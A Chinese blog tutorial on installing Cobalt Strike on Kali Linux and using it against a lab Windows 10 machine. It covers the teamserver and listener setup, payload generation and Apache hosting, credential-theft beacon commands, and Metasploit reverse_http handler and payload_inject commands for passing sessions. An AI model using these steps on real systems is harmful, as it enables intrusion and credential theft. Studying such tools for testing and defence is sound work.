发布于2022年11月4日3年前 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。环境介绍kali linux 2021Cobalt Strike4.3windows10(受害机)在kali中安装Cobalt Strike在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。这样便启动了Cobalt Strike如上会提示登录这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:./teamserver 192.168.123.33 pass66 #./teamserver kali的ip 登录密码生成shell首先配置监听和msfconsole类似,Cobalt Strike也要配置监听。Cobalt Strike——Listeners——Add相关参数说明:参数说明name监听任务的名称 可随意payload监听的方式 支持http https TCP 等HTTPS HOSTS主机IP地址Host Rotation Strategy主机转移策略 一般默认即可生成shellAttacks—Packages——windows ececutable 配置windows平台下的shell保存生成的shell参数说明HTML Application基于http方式的攻击,如受害者打开网站即可获得shellMS Office Macrooffice宏攻击,如打开word文档即可获得shellPayload Generator其他方式的payload,如C python vbwindows ececutable生成windows平台下的shellShell上线将生成的shell放到/var/www/html,并启动apache服务器cp kali.exe /var/www/html service apache2 start当目标主机下载并运行shell后,我们便可以看到回弹。对目标主机的操作interact 命令模式当我们点击interact后,便会和msfconsole一样,进入命令模式。现列出常用的命名参数说明argue匹配进程的欺骗参数blockdlls阻止子进程中的非Microsoft DLLbrowserpivot设置浏览器会话cancel取消正在进行的下载cd改变目录位置checkin呼叫总部并发布数据chromedump从Google Chrome恢复凭据clear清除信标队列connect通过TCP连接到目标covertvpn部署隐蔽VPN客户端cp复制文件dcsync从DC提取密码哈希desktop查看目标桌面并与之交互dllinjectbbskali.cndllload将反射DLL注入进程download文件下载downloads列出正在下载的文件drives列出目标上的驱动器elevate在提升的上下文中生成会话exit关闭当前连接getprivs对当前令牌启用系统权限getsystem提升系统权限getuid获取用户IDhashdump导出hash密码keylogger记录键盘killKill 掉进程logonpasswords使用mimikatz转储凭据和哈希ls列出文件列表 bbskali.cnmake_token创建一个 tokenmimikatz运行神器 mimikatzmkdir创建一个目录mv移动文件net网络和主机枚举upload上传文件如获取C盘文件信息cd / ls和目标屏幕交互desktop其他菜单操作由于比较多,就不一个个说了。把常用的几个菜单说说。可视化的文件浏览Explore-File Browser对局域网内所有设备扫描显示目标的所有进程Cobalt Strike与Msfconsole联动首先我们在Cobalt Strike中创建一个新的Foreign Http监听然后在msfconsole中配置监听use exploit/multi/handler set payload windows/meterpreter/reverse_http set LHOST 192.168.123.33 set LPORT 4444 exploit返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听这时,我们返回到msf中便可以看到成功得到回弹。将msf会话转移到Cobalt Strike一样,我们先建立一个http的监听因为在msf中我们已经获得了session在其配置如下:use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true set LHOST 192.168.123.33 set LPORT 5555 set SESSION 1 runset DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。然后我们返回到Cobalt Strike这时便可以看到会话了其他文章推荐《Cobalt Strike 目标上线微信提示》《Cobalt Strike入坑指南(利用office文件获取shell)》未完待续…… 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/2592.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见